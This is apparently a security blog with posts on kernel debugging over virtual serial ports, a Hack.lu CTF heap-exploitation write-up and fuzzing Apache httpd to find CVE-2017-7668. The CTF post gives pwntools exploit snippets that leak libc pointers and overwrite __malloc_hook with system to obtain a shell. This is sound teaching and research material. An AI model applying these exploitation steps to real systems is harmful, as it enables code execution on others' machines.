Friday, December 29, 2017

Linux Kernel Debugging with VMWare Player Free

Intro

This post should be a short one in the sense that it only covers how to configure two Linux virtual machines, one as the debug host and the other as the debuggee, under a Windows host.
I was encouraged to write it because I couldn't find the right information (maybe my fault) on my journey to analyse CVE-2017-1000112 and had to figure it out myself.

As a final note, this post means I am shifting my research a bit towards the Linux Kernel instead of desperately trying to find an exploitable user-land heap vulnerability since, to easily exploit a vulnerability on the heap, you either need:
  • No ASLR
  • A scripting environment
    • This happens mostly in browsers since we have JavaScript and the likes
  • Be so lucky that your heap corruption happens on a function pointer
    • and also have all the ROP Gadgets at hand
  • Be Chris Evans and be able to craft scriptless exploits

Credit where credit is due

This post is a "diversion" from the post Adapting the POC for CVE-2017-1000112 to Other Kernels. It is a good post in the sense that it holds you by the hand and guides you through setting up the right version of the Kernel with the right source code. This can sometimes be tedious to do, so mad props for doing it, NeverEndingSecurity!

(useless) .vmx file

If you have done a bit of research before landing on this blog post, you might have already encountered the following options:
debugStub.listen.guest64 = "TRUE"
debugStub.listen.guest64.remote = "TRUE"
Such options are the ones that, according to some sources on the interwebz or the VMWare OSDev Wiki, will enable you to debug your kernel over a network connection. This wasn't working for me at all, no matter which combination of these I added. Wild guess here: these options don't work on the Free Player version.
But hey! Do not worry if you still have no clue what I am talking about; you don't need these to debug your Kernel if you're reading this post :)

kgdb

This was another bit of a rabbit hole, caused by trying to establish a remote debugging connection over either TCP or UDP.
At first, one would land (or I did land first) on the following resource: https://www.kernel.org/pub/linux/kernel/people/jwessel/kgdb/
Said resource is a bit scarce on documentation and takes for granted that you're a level 42 sysadmin and not just someone with enough curiosity to debug a Kernel exploit.

kgdboe

"The term kgdboe is meant to stand for kgdb over ethernet. To use kgdboe, the ethernet driver must have implemented the NETPOLL API, and the kernel must be compiled with NETPOLL support. Also kgdboe uses unicast udp. This means your debug host needs to be on the same lan as the target system you wish to debug."
Ok so, kgdboe seems to be what I wanted. Now I needed to know if I had it enabled on the Kernels I had just installed. This can be done by checking the modules directory:
ls -l /sys/module/ | grep -i "kgdb"

It seems that I didn't have the kgdboe module loaded. For the sake of simplicity I am skipping the part where I failed to compile the whole kernel with kgdboe and NETPOLL support.
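By the way, another quick way to check what kgdb and NETPOLL support your running kernel was built with (a sketch, assuming your distro ships the kernel config under /boot) is grepping the config:

grep -iE "config_kgdb|config_netpoll" /boot/config-$(uname -r)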

kgdboc

I skipped it because something caught my attention. It was the presence of the kgdboc module:
The kgdboc driver was originally an abbreviation meant to stand for "kgdb over console". Kgdboc is designed to work with a single serial port. It was meant to cover the circumstance where you wanted to use a serial console as your primary console as well as using it to perform kernel debugging. Of course you can also use kgdboc without assigning a console to the same port.
That seems to be what I actually wanted to do: having a remote terminal debugging another host. No need for networking! Just some old-school serial ports!

Serial ports on VMWare Player Free

Let's do it! Open VMWare Player and, in the settings of the debugging machine (the one that is going to connect to the remote debugger), we need to add a new device: a Serial Port, just like in the following image:


There are some key points here on the right of the image (they map onto the .vmx entries sketched after this list). Since this is our debugging machine:
  • The name of the pipe should be the same for both machines
  • This is the debugger connecting to a remote target: This end is the client.
  • Of course, the other end is a Virtual Machine (VMWare will do its magic)
  • We are debugging, we need some kind of "sync" by consuming CPU: Polling
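
These GUI choices end up as plain entries in each VM's .vmx file. A rough sketch of what they map to (key names assumed from VMware's usual serial port options; the pipe name "\\.\pipe\kgdb_pipe" is just an example):

# Debugging machine (the client end):
serial0.present = "TRUE"
serial0.fileType = "pipe"
serial0.fileName = "\\.\pipe\kgdb_pipe"
serial0.pipe.endPoint = "client"

# Debugged machine (the server end): same entries, except
serial0.pipe.endPoint = "server"

The polling choice is made from the GUI as well, so there is no need to touch these by hand; they are shown only so you can sanity-check what VMWare wrote.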

With this in mind, we can configure the debugged machine where our debugging server will be:


The only thing that is different in this configuration is the This end is the server setting.
We can now test our newly connected serial port:
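A quick way to do that test (assuming the new port shows up as /dev/ttyS1 inside both guests, which is the device used later in this post) is to cat the device on one VM and echo into it from the other:

# On the debugged machine (server end):
cat /dev/ttyS1
# On the debugging machine (client end):
echo "hello over the named pipe" > /dev/ttyS1

If the text shows up on the first VM, the pipe is wired correctly.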


Configuring kgdboc

One of the final steps is to tell kgdb which serial port to send and receive its debugging information on. There are two ways to configure this: at boot time (adding the option to our init line in grub) or, the one we are going to cover, writing to the module's parameter file at runtime. Remember the kgdboe section?
echo ttyS1,115200 > /sys/module/kgdboc/parameters/kgdboc
The really final step is to trigger a debugging interrupt so that the client can attach to the remote debugger.

SysReq keys

The SysReq keys are still quite a magical thing to me. The use I make of them most often is rebooting a hung Linux machine even when all seems lost.
For our specific case, we are going to be looking at the SysReq Key "g":
If the in-kernel debugger kdb is present, enter the debugger.
In order not to have to enable all the SysReq requirements and press the alt+SysReq+KEY combination every time I boot, I created a file named kgdb_commands. The file contains:
echo ttyS1,115200 > /sys/module/kgdboc/parameters/kgdboc
echo g > /proc/sysrq-trigger
The first command we already know; the second will trigger the "g" functionality and enter the debugger, which is now configured to send its information to our /dev/ttyS1 serial port.
Bear in mind that these commands should be run as root!
sudo bash -f kgdb_commands
After doing so, on the client machine after loading gdb and our sources, we run:
target remote /dev/ttyS1
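
Putting the client side together, the session looks roughly like this (a sketch; the vmlinux and source paths depend on how you built the debuggee's kernel):

# On the debugging (client) machine:
gdb ./vmlinux
(gdb) target remote /dev/ttyS1
(gdb) break some_function      # whatever function the exploit exercises
(gdb) continue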


On the following image we can see the outcome of setting a breakpoint on a certain function as per the exploit:


Conclusion

Always go back in time and think: what would a Sysadmin have done 10 years ago? For sure an answer will be there waiting for you, be it in the form of serial ports, terminals or SysReq keys!

Further References


Saturday, October 21, 2017

Hack.lu - HeapHeaven write-up with radare2 and pwntools (ret2libc)

Intro

In the quest to do heap exploits, learning radare2 and the like, I got myself hooked into a CTF that caught my attention because of it having many exploitation challenges. This was the Hack.lu CTF:
Hack.lu challenges by FluxFingers
You can see from that list the Pwn category that there are a few ones so I tried not to overkill myself with difficulty and go for the easiest Heap one, HeapHeaven. As much as I wanted to try the HouseOfScepticism because of the resemblance with the Malloc Malleficarum techniques, when opening it on radare2, it looked quite a bit daunting: no symbols, tons of functions here and there and my inexperience on reading assembly. Another goal for this post is to make some kind of introduction to the usage of radare2. It's quite a good tool with tons of utilities inside such as ROP, search for strings, visual graphs, etc.

The analysis

heaps and pieces

For this challenge we are given (again) the libc.so.6 along with the binary. This is a good giveaway that we will have to jump to libc functions to gain code execution. The binary itself is just:

HeapHeaven: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, 
interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, 
BuildID[sha1]=617e9a6742b6537d6868f2f8355d64bea4316a99, not stripped

Cool! It's not stripped. This means that we have all the debugging symbols. The first thing I did was throw it into radare2 and check the functions from the menu we are presented with:
HeapHeaven menu

We can see that the functions should be something like "whaa!", "mommy?", etc.

Firing up the radar

We fire up radare2 against the HeapHeaven file like so:
$: radare2 HeapHeaven -AA
This will open the file and do an extensive analysis of it. For a quicker but less extensive analysis, we can just put a single "A". Once the analysis is complete, we can head to the var code analysis menu by typing the command vv and pressing enter. If you have never used radare2, you are probably wondering whether all the commands are going to be like "aa", "vv" and "cc". Well...

radare2 trolling

After typing in vv we are presented with the whole lot of functions resolved by radare2 due to the file not being stripped. Yay!
Non-stripped symbols on radare2

By inspecting the first function from the menu, namely "whaa!", we see a function parsing a number and then a call to malloc. Our intuition tells us that this function will serve to allocate chunks of whichever size we specify and that the other functions will be doing all the other heap manipulation. To prove this inside radare2, we browse with the arrow keys to the function we want and then press g to seek to that function's position. Then press V (shift + "v") to go to the visual graph representation.
whaa! function representation
Watch out for the differences here vs x86 (32-bit). As we can see, the arguments aren't pushed to the stack like we are used to seeing on x86. On x86_64, the most common way is to pass the arguments in registers, especially the RDI register. Something that doesn't change is how functions return their values, that is, in the RAX/EAX register. I am going to spoil the get_num function a bit and say that it is actually not parsing a number. Let's see it in radare2. Again, seek to the function and press capital V:
Disassembly of get_num
It is clearly seen that the function is trying to read, through the scanf function, the format %255s, and that the input will be stored at the location pointed to by the RAX register. In radare2 it's shown as local_110h, which is then passed to parse_num.

Zoom out of parse_num function.

Here, thanks to the blue arrows that radare2 draws, we can observe that most likely there is some kind of loop logic happening. Since it is parsing a "number" and a string was previously scanf'ed, it would not be a bad assumption to think that it's parsing our string.

Prologue of parse_num function.
Indeed, the string is passed in RDI and then stored in a local variable local_18h. This is afterwards compared against certain bytes and the counter of the loop (local_ch) is incremented by 2. The operation done inside the loop is actually "binary adding" through bitshifting with the shl opcode. Finally, the result is stored in another variable (local_8h) to be returned in RAX.

Function parse_num comparing bytes.
I spent some time "deciphering" what this code was doing and reading about opcodes. If we watch closely, both comparisons are doing almost the same thing. The only difference is that the second one increases the counter by one (rax + 1) and then accesses the byte at that offset of the array (mov rax, qword [local_18h]; add rax, rdx; movzx eax, byte [rax]) to compare it against the byte 0x69 (letter "i"). Something that would help us at this point is renaming the variables to something more user friendly. In radare2, we can do this by seeking to the offset of the function we want with:

[0x00000b8d]> s sym.parse_num 
[0x000009ca]> afvn local_ch counter_int
[0x000009ca]> afvn local_18h arg_string
[0x000009ca]> afvn local_8h result

Second part of parse_num function with renamed variables.

This is now quite a bit clearer, isn't it? Basically, the input is compared against the bytes 0x77, 0x69 and 0x61. If a byte is 0x77 (letter "w"), the code jumps to the next char and checks whether it's 0x69 or 0x61 (letter "a"). If that next char is "i", it adds one to the result; else, if the char is "a", it just increases the counter and keeps parsing. See the translation? We are feeding binary numbers as toddler speak (according to FluxFingers), "wi" being 1 and "wa" being 0.
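
To make the parsing concrete, here is a rough Python re-implementation of what parse_num seems to do (a sketch based on my reading of the disassembly; the exact handling of characters other than "wi"/"wa" is approximated):

def parse_babble(babble):
    result = 0
    counter = 0
    while counter < 0x3f:                  # the loop runs until the counter reaches 0x3f
        pair = babble[counter:counter + 2]
        if pair == "wi":                   # "wi" -> shift in a 1 bit
            result = (result << 1) | 1
        elif pair == "wa":                 # "wa" -> shift in a 0 bit
            result = result << 1
        counter += 2                       # the counter advances by 2 each round
    return result

# e.g. parse_babble("wiwa" + "0" * 250) == 0b10 == 2

Note that this round-trips with the translate_baby encoder shown later in the exploit section.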

The exploit

Having the following functions:

whaa!: Allocates chunks of a specified size.
mommy?: Reads a string from a specified offset.
<spill>: Writes to a specified offset.
NOM-NOM: Frees a pointer at a specified offset.

Here's what we need to do.
  1. Leak top and heap pointers
  2. Calculate the offset to __malloc_hook
  3. Calculate the offset to system
  4. Write the address of system into __malloc_hook
  5. Call system with "/bin/sh" as an argument

babbling comprehensively

To code the solution I relied heavily on pwntools by Zach Riggle. The library is just great. I started by writing a function that translates a number into comprehensible babbling ("wiwawiwa"-like).

...
def translate_baby(size):
    wiwa = ""
    for bit in ("%s" % "{0:b}".format(size)):
        if bit == "1":
            wiwa += "wi"
        else:
            wiwa += "wa"
    return ("%s" % (wiwa+"0"*(254-len(wiwa))))
...

I am padding the string with zeroes to the right. This is because scanf tries to read %255s and the loop won't stop until the counter reaches 0x3f. This would cause trouble because, if we don't pad enough chars to the right, the parse_num function will keep reading values from memory and, in case there is another "wiwa" around there, it will mess up our calculations #truestory.
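
The snippets below also use a set of helpers (allocate_chunk, free_chunk, read_from, write_to) that are nothing more than thin pwntools wrappers around the four menu options. A minimal sketch of the idea, assuming hypothetical menu option numbers, prompts and leak formatting (the real strings depend on the binary):

from pwn import *

io = process("./HeapHeaven")   # local testing; remote(host, port) for the real target

def allocate_chunk(size, io):
    io.sendlineafter("?", "1")                    # hypothetical option for "whaa!"
    io.sendlineafter("?", translate_baby(size))   # size spelled out as wi/wa babbling

def read_from(offset, io):
    io.sendlineafter("?", "2")                    # hypothetical option for "mommy?"
    io.sendlineafter("?", translate_baby(offset))
    return u64(io.recvline().strip().ljust(8, "\x00"))  # hypothetical leak parsing

def write_to(offset, io, data):
    io.sendlineafter("?", "3")                    # hypothetical option for "<spill>"
    io.sendlineafter("?", translate_baby(offset))
    io.sendline(data)

def free_chunk(offset, io):
    io.sendlineafter("?", "4")                    # hypothetical option for "NOM-NOM"
    io.sendlineafter("?", translate_baby(offset))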

leaking addresses

From the Painless intro to ptmalloc2, we remember that a normal chunk had the following structure:

 +---------------------------------+-+-+-+
 | CHUNK SIZE                      |A|M|P|
 +---------------------------------+-+-+-+ 
 |           FORWARD POINTER(FD)         |
 |            BACK POINTER(BK)           |
 |                                       | 
 |                                       |
 | -  -  -  -  -  -  -  -  -  -  -  -  - |
 |         PREV_SIZE OR USER DATA        |
 +---------------------------------------+

The FD pointer is set either to the top chunk pointer, if it's the only free chunk of that size, or to the next free chunk of the same size if more chunks are free'd afterwards. Since we can read from a certain offset, we are able to trigger allocations and frees to set top and FD pointers and then read them:
...
    # Allocate four chunks so we can avoid coalescing chunks and leak:
    # * Pointer to chunk2 
    # * Pointer to main_arena+88 (av->top)
    allocate_chunk(0x128, io)
    allocate_chunk(0x128, io)
    allocate_chunk(0x128, io)
    allocate_chunk(0x128, io)

    # Now free chunks 2 and 4 in that order so we can access their FD
    # The first free'd chunk's FD will point to main_arena->top
    # The second free'd chunk's FD will point to the second chunk
    free_chunk(0x20, io)
    free_chunk(0x280, io)

    # Read the FD pointers and store them to calculate offsets to libc
    main_arena_leak = read_from(0x20, io)
    print("[+] Main_arena: %#x" % main_arena_leak)
    heap_2nd_chunk = read_from(0x280, io)
    print("[+] 2nd chunk: %#x" % heap_2nd_chunk)
...

I am not going to cover why or where those pointers are set since I think I have covered this matter extensively in previous heap posts (don't be lazy, read them!). However, it's mandatory to explain why we free the offset 0x20 and the offset 0x280. When the program starts, it triggers a malloc(0x0) which, in turn, reserves 32 bytes (0x20 in hex) in memory. As you may remember, fastchunks only set their FD pointer (fastbins are singly linked lists), hence we jump over the first fastchunk and go straight to freeing the next chunk of size 0x130 in memory (we allocated 0x130-0x8 in order to trigger an effective allocation of 0x130 in memory). This will set its FD and BK pointers to the top chunk in main_arena.
FD and BK pointers of the first free'd chunk pointing to main_arena's top chunk.

Now we free the fourth chunk in order to populate its FD pointer and make it point to the first free'd chunk. See how the FD pointer is pointing to the previously free'd chunk 0x55cd4bd8020.

Status of the fourth chunk after the second free
We are ready to leak the addresses now. The only thing we need to do is call the menu function "mommy?" and feed it the previous offsets:

...
    # Read the FD pointers and store them to calculate offsets to libc
    main_arena_leak = read_from(0x20, io)
    print("[+] Main_arena: %#x" % main_arena_leak)
    heap_2nd_chunk = read_from(0x280, io)
    print("[+] 2nd chunk: %#x" % heap_2nd_chunk)
...

Return to libc (ret2libc)

After leaking both addresses, one into the heap and another one inside main_arena, we have effectively bypassed ASLR. The main_arena is always placed at a fixed relative position with respect to the other functions of the libc library; after all, the heap is implemented inside libc. To obtain the offsets to other functions we can just query inside gdb and then adjust the offsets depending on the libc we are targeting.

Calculating offsets within gdb
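
The queries behind that screenshot are roughly these (a sketch, assuming a libc with symbols loaded in gdb):

(gdb) p &main_arena
(gdb) p &__malloc_hook
(gdb) p &system

Subtracting the printed addresses (and remembering that our leak points to main_arena+88, av->top) gives the 0x68 and 0x37f780 deltas used below.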
Let's start assigning all of this inside our exploit code:

...
    # Offset calculation
    happa_at = heap_2nd_chunk - 0x10
    malloc_hook_at = main_arena_leak - 0x68
    malloc_hook_offset = malloc_hook_at - happa_at
    libc_system = malloc_hook_at - 0x37f780
...

The variable happa_at is the address of the base of the heap, that is, the first allocated chunk of them all. malloc_hook_at represents the absolute address of the weak pointer __malloc_hook. We are using this hook to calculate offsets instead of the top chunk (there is no special reason for this). Finally, the system symbol is calculated and stored in the libc_system variable. We need happa_at because, when using the "<spill>" function, we have to provide as the first argument an offset (not an address!). This offset starts from the base of the heap (namely, happa_at). Then, we provide the string we want to write at that offset. Our goal is to write the address of system at __malloc_hook. There are several techniques to redirect code execution, such as creating fake FILE structures, overwriting malloc hooking functions or going after the dtors. I chose this one since I feel it's simple enough and quite convenient, as the function we place in __malloc_hook must have the same form as malloc. This means that the function we place there must take an argument just as malloc does, so system fits very well.
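
To make the "same form as malloc" point concrete, this is roughly how the glibc hook mechanism works (a simplified sketch, not the actual glibc source):

/* Simplified sketch of glibc's malloc hook mechanism. */
void *(*__malloc_hook)(size_t size, const void *caller);

void *malloc(size_t size)
{
    if (__malloc_hook != NULL)
        return (*__malloc_hook)(size, __builtin_return_address(0));
    /* ... normal allocation path ... */
}

/* Once the hook is overwritten with system, a call such as
 *   malloc((size_t)"/bin/sh");
 * effectively becomes system("/bin/sh"). */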

wiwapwn

Bear in mind that __malloc_hook only gets triggered when an allocation happens and that the argument to malloc is passed on to __malloc_hook, and therefore on to system. This means that the last malloc we trigger needs to receive, as its argument, a pointer to the string "/bin/sh\x00". We can satisfy this by writing the string to any of the chunks already allocated and then feeding the pointer to that chunk's position. I've chosen the first allocated chunk at offset 0x0, that is, the pointer pointed to by happa_at:
...
    # write /bin/sh to the first chunk (pointed by happa_at)
    write_to(0x0, io, "/bin/sh\x00")
...
Since we have calculated all the offsets we need, let's overwrite __malloc_hook with the pointer to system:

...
    # Write the address of system at __malloc_hook
    write_to(malloc_hook_offset, io, p64(libc_system))
...

All we need to do now is trigger __malloc_hook with the address of "/bin/sh\x00" as an argument and interact with the shell:

...
    # Call malloc and feed it the argument of /bin/sh which is at happa_at
    # This will trigger __malloc_hook((char*)"/bin/sh") and give us shell :)
    allocate_chunk(happa_at, io)
...

Exploit for HeapHeaven

Final notes

Note that I didn't need to change any offsets to match the remote system's libc. This was because the system I used to build the exploit had the same libc. In case we don't have the same libc but are provided with it, what we need to do is calculate the base of libc through the leaked pointers and then add the offsets, like so:

Exploit for HeapHeaven
Then, in our code we would have:

libc_system = calculated_libc_base + 0x45390

As a final note: this write-up was actually published on my company's internal blog, and I decided to also make it public through my own blog since I don't think write-ups are SensePost's-blog-worthy.

I hope you enjoyed this write-up as much as I enjoyed solving this challenge! You can get the full HeapHeaven exploit code here.

Sunday, July 16, 2017

From fuzzing Apache httpd server to CVE-2017-7668 and a $1500 bounty

Intro

In the previous post I thoroughly described how to fuzz Apache's httpd server with American Fuzzy Lop. After writing that post, to my surprise, I got a few crashing test cases. I say "to my surprise" because anybody who managed to get some good test cases could have found this before me and yet, despite that, I was the first to report the vulnerability. So here's the blog post about it!

Goal

After seeing the Apache httpd server crash under AFL, lots of problems arise: the crashing tests don't crash outside of the fuzzer, the stability of the fuzzed program goes way down, etc. In this blog post we will try to give an explanation for these happenings while showing how to get the bug and, finally, we will shed some light on the crash itself.

Takeaways for the reader

  • Testcases scraped from wikipedia
  • Bash-fu Taos
  • Valgrind for triage
  • Valgrind + gdb: Learn to not always trust Valgrind
  • rr

The test cases

Since this was just a test case for myself on fuzzing network-based programs with AFL, I did not bother too much with getting complex test cases or ones with a lot of coverage.
So, in order to get a few test cases that would cover a fair amount of a vanilla installation of Apache's httpd server, I decided to look up an easy way to scrape all the headers from the List of headers - Wiki page.

Bash-fu Tao 1: Butterfly knife cut

The first thing I did was just copy-paste the two tables under Request Fields into a text file with my editor of choice. It is important that your editor of choice doesn't replace tabs with spaces or the cut command will lose all its power. I chose to call my file "wiki-http-headers" and, after populating it, we can select the third column of the tables by doing the following. Remember that the default delimiter for cut is the TAB character:

cat wiki-http-headers | cut -f3 | grep ":" | sed "s#Example....##g" | sort -u

We can see that some headers are gone, such as the TSV header. I ignored those and went on to fuzzing since coverage was not my concern - the real goal was to fuzz. Maybe you can find new 0-days with the missing headers! Why not? ;)

Bash-fu Tao 2: Chain punching with "for"

Now that we have learned our first Tao, it is time to iterate over each header and create a test case per line. Avid bash users will already know how to do this but, for the newcomers and learners, here's how:

a=0 && IFS=$'\n' && for header in $(cat wiki-http-headers | cut -f3 | grep ":" | sort -u); do echo -e "GET / HTTP/1.0\r\n$header\r\n\r\n" > "testcase$a.req";a=$(($a+1)); done && unset IFS

Let me explain such an abomination quickly. There is a thing called the Internal Field Separator (IFS), which is an environment variable holding the tokens that delimit fields in bash. By default in bash the IFS contains the space, the tab and the newline. Those separators will interfere with headers containing spaces because the for command in bash iterates over a given list of fields (fields are separated by the IFS) - this is why we need to set the IFS to just the newline. Now we are ready to just iterate and echo each header to a different file (the a variable helps dump each header to a file with a different name).

Bash-fu Tao Video

Here is one way to approach the full bash-fu Taos:

The fuzzing

Now that we have gathered a fair amount of (rather basic) test cases, we can start our fuzzing sessions. This section is fairly short as everything on how to fuzz Apache httpd is explained in the previous post. However, the minimal steps are:
  1. Download apr, apr-utils, nghttp2, pcre-8 and Apache httpd 2.4.25
  2. Install the following dependencies:
    1. sudo apt install pkg-config
    2. sudo apt install libssl-dev
  3. Patch Apache httpd
  4. Compile with the appropriate flags and installation path (PREFIX environment variable)
Now it all should be ready and set up to start fuzzing Apache httpd. As you can see in the following video, with a bit of improved test cases the crash doesn't take long to come up:

It is worth mentioning that I cheated a bit for this demo as I already introduced a test case I knew would make it crash "soon". I obtained the crashing test case through a combination of honggfuzz, radamsa and AFL while checking the stability + "variable behaviour" folder of AFL.

The crashing

Disappointment

First things first. When we have a crashing test case it is mandatory to test whether it is a false positive or not, right? Let's try it:
Euh... it doesn't crash outside of the fuzzer. What could be happening?

Troubleshooting

There are a few things to test against here...

- First of all we are fuzzing in persistent mode:
This means that maybe our test case did make the program crash, but that it was one of many. In our case the __AFL_LOOP variable was set to over 9000 (a bit too much, to be honest). For those that don't know what said variable is for, it is the number of fuzzing iterations that AFL will run before restarting the whole process. So, in the end, reproducing the crash AFL discovered would, in the worst case, require launching all the other 8999 non-crashing inputs first and then the crashing one (i.e. the last test case, number 9000).
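
For reference, this is the general shape of AFL's persistent mode when compiled with afl-clang-fast (a minimal sketch, not the actual Apache patch):

/* Minimal persistent-mode harness sketch; requires afl-clang-fast. */
#include <unistd.h>

/* stand-in for handing the request buffer to the real server logic */
static void process_request(const char *buf, ssize_t len) { (void)buf; (void)len; }

int main(void) {
    static char buf[65536];

    while (__AFL_LOOP(9000)) {              /* 9000 iterations per process, as above */
        ssize_t len = read(0, buf, sizeof(buf) - 1);
        if (len <= 0) continue;
        process_request(buf, len);
    }
    return 0;
}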

- The second thing to take into account is the stability that AFL reports:
The stability keeps going lower and lower. Usually (if you have read the README from AFL you can skip this part) low stability can be due either to the use of random values (or date functions, hint hint) in your code or to the usage of uninitialised memory. This is key to our bug.

- The third and last (and least in our case) would be the memory assigned to our fuzzed process:
In this case the memory is unlimited as we are running afl with "-m none" but in other cases it can be an indicator of overflows (stack or heap based) and access to unallocated memory.

Narrowing down the 9000

To test against our first assumption we need more crashing cases. To do so we just need to run AFL with our "crashing" test case only. It will take no time to find new paths/crashes which will help us narrow down our over 9000 inputs to a much lower value.

Now, onto our second assumption...

Relationship goals: Stability

When fuzzing, we could check that stability was going down as soon as AFL was getting more and more into crashing test cases - we can tell there is some kind of correlation between the crashes and memory. To test if we are actually using uninitialised memory we can use a very handy tool called...

Valgrind

Valgrind is composed of a set of instrumentation tools to do dynamic analysis of your programs. By default, it runs "memcheck", a tool to inspect memory management.
To install Valgrind on my Debian 8 I just needed to install it straight from the repositories:
sudo apt install valgrind
After doing that we need to run Apache server under Valgrind with:
NO_FUZZ=1 valgrind -- /usr/local/apache-afl-persist/bin/httpd -X
The NO_FUZZ environment variable is read by the code in the patch to prevent the fuzzing loop to kick in. After this we need to launch one of our "crashing" test cases into Apache server running under Valgrind and, hopefully, our second assumption about usage of uninitialised memory will be confirmed:

We can confirm that, yes, Apache httpd is making use of uninitialised values but, still... I wasn't happy that Apache wouldn't crash, so let's use our Bash-fu Tao 2 to iterate over each test case and launch it against Apache.

Good good, it's crashing now! We can now proceed to do some basic triage.

The triage

Let's do a quick analysis and see which (spoiler) header is the guilty one...

gdb + valgrind

One cool feature about valgrind is that it will let you analyse the state of the program when an error occurs. We can do this through the --vgdb-error=1 flag. This flag will tell valgrind to stop execution on the first error reported and wait for a debugger to attach to it. This is perfect for our case since it seems that we are accessing uninitialised values and accessing values outside of a buffer (an out-of-bounds read), which is not a segfault but is still an error under valgrind.
To use this feature, first we need to run in one shell:
NO_FUZZ=1 valgrind --vgdb-error=0 -- /usr/local/apache_afl_blogpost/bin/httpd -X
Then, in a second separate shell, we send our input that triggers the bug:
cat crashing-testcase.req | nc localhost 8080
Finally, in a third shell, we run gdb and attach through valgrind's command:
target remote | /usr/lib/valgrind/../../bin/vgdb
We are now inspecting what is happening inside Apache at the exact point of the error:

Figure 1 - Inspecting on first valgrind reported error.

As you can see the first reported error is on line 1693. Our intuition tells us it is going to be the variable s as it is being increased without any "proper" checks, apart from the *s instruction, which will be true unless it points to a null value. Since s is optimised out at compile time, we need to dive into the backtrace by going up one level and inspecting the conn variable which is the one that s will point to. It is left as an exercise for the reader as to why the backtrace shown by pwndbg is different than the one shown by the "bt" command.
For the next figures, keep in mind the 2 highlighted values on Figure 1: 0x6e2990c and 8749.


Here is where, for our analysis, the number from Figure 1, 8749, makes sense, as we can see that the variable conn is allocated with 8192 bytes at 0x6e2990c. We can tell that something is wrong as 8749 is way past the allocated 8192 bytes.


This is how we calculated the previous 8749 bytes. We stepped into the next error reported by valgrind by issuing the gdb "continue" command and letting it error out. There was an invalid read at 0x6e2bb39 and the initial pointer to the "conn" variable was at 0x6e2990c. Remember that s is optimized out, so we need to do some math here as we can't get the real pointer from s at debugging time. That said, we get the offset with:
invalid_read_offset = valgrind_error_pointer - conn
which is:
8749 = 0x6e2bb39 - 0x6e2990c

rr - Record & Replay Framework

During the triage process, one can find several happenings that hinder debugging: Apache will stop out of nowhere (I haven't managed to find out why), valgrind will make it crash in places where it is not supposed to because it adds its own function wrappers, the heap will be different in valgrind debugging sessions than in plain gdb or vanilla runs, etc.
Here is where the Record & Replay Framework comes in handy: deterministic replaying of the program's state. You can even replay the execution backwards which, in our case, is totally awesome! I must say I discovered this tool thanks to a good friend and colleague of mine, Symeon Paraschoudis, who introduced this marvellous piece of software to me.
Let's cause the segmentation fault while recording with rr and replay the execution:
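The basic workflow is short (the httpd path is the same one used for the valgrind runs above):

# Record a run of Apache under rr and crash it from another shell:
rr record /usr/local/apache_afl_blogpost/bin/httpd -X
# Then replay the very same execution deterministically:
rr replay
(gdb) continue             # run forward until the SIGSEGV
(gdb) reverse-continue     # and walk backwards from the crash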

Full analysis is not provided as it is outside of the scope of this post.

Conclusions

We have learned how to use bash to effectively scrape stuff from the web as test cases, and to believe that, even though hundreds of people might be fuzzing a certain piece of software, we can still add value when using the right combination of tools, mutations and knowledge.
We have also discovered tools along the way that will aid further triage.

Stay tuned for the search of animal 0day! Cross-posts from the SensePost blog upcoming with challenges on heap-exploitation!

Post-Scriptum

I am willing to donate the $1500 bounty I received from the Internet Bug Bounty to an organisation related to kids' schooling and, especially, one teaching and providing means regarding Information Technologies. Knowledge is Power! So tune in and leave your suggestions in the comment section below; I have thought of ComputerAid, any opinions on this?

Sunday, May 7, 2017

Fuzzing Apache httpd server with American Fuzzy Lop + persistent mode

Intro


Goal

When stumbling upon the great American Fuzzy Lop and trying its awesome deterministic fuzzing capabilities and instrumentation, we soon find out that this fuzzer was built to fuzz programs that take input from the command line (or standard input) instead of a network socket. Because of that, I thought I would give it a try and make AFL fuzz Apache's httpd server: first the AFL way, by adding a new option to Apache's command line, and second, by using persistent fuzzing (afl-clang-fast) and shamelessly copying the way Robert Swiecki fuzzes Apache with honggfuzz.

Takeaways for the reader

  • Learn to fuzz network based programs with AFL
  • Code to start fuzzing Apache with AFL in no time
  • Testcases scraped from wikipedia
  • A push in the interwebz fuzzing race
Let's do it!

Setup part 1

I will be using a Debian GNU/Linux 8 64bit with the kernel 4.9.0-0.bpo.2-rt-amd64. You don't really need that setup, this can be done on Ubuntu as well. All that you need is an operating system (under a virtual machine or not) that can compile and run AFL with the afl-clang feature.

But, before getting into any compilations/installations/fuzzing, I encourage you to set up an organised folder structure that suits you best; in case you haven't got one already, I am sharing mine.
Under the Fuzzing folder I have:
  • Victims - For the target programs that we are about to fuzz
  • Fuzzers - AFL, honggfuzz, radamsa, etc. go here
  • Testcases  - The samples we are going to feed the fuzzer to throw against our Victim
  • Sessions - For storing the fuzzing sessions
  • Compilers - To store compilers such as clang-4.0 and binaries needed to compile

Getting clang-4.0 and llvm-tools

Getting pre-built binaries for clang-4.0 and the llvm-tools is fairly easy if you have Debian or Ubuntu. You can get these from here http://releases.llvm.org/download.html. In my case the clang+llvm-4.0.0-x86_64-linux-gnu-debian8.tar.xz tarball.
If you are following the structure mentioned above, you can cd into your Compilers folder, drop the tarball there, extract it and then add the binaries folder to your path by adding the following line to the end of your ~/.bashrc file (neither ~/.profile nor /etc/environment worked for me - it seems that you need to log out and log in for these changes to take effect).
PATH="$HOME/Fuzzing/Compilers/clang+llvm-4.0.0-x86_64-linux-gnu-debian8/bin:$PATH"
Now issuing the which command on a new shell we should have the following output:
which clang
/home/javier/Fuzzing/Compilers/llvm-clang-binaries/clang+llvm-4.0.0-x86_64-linux-gnu-debian8/bin/clang

Compiling and Installing AFL

Compiling AFL should be pretty straightforward but, for the lazy, you can just copy-paste these commands and you should be ready to go:
sudo apt install build-essential
wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
tar -xzf afl-latest.tgz
cd afl*
make && sudo make install && 
echo -e "\n[+] AFL ready to fuzz at $(which afl-fuzz)"

That's it, the binary afl-fuzz should be in your path now ready to be unleashed.

Compiling and installing Apache

First, move to a folder where we are about to download all the dependencies needed by Apache and Apache itself. In my case the folder is at ~/Fuzzing/Victims/apache_afl/.

Before compiling Apache we are going to need the Apache Portable Runtime (APR), APR Utils and support for HTTP/2 through nghttp2.
No laziness this time, go download:
Now we need to get the latest Apache build, which I recommend you do from their subversion repository by doing so:
sudo apt install subversion
svn checkout http://svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x httpd-2.4.x
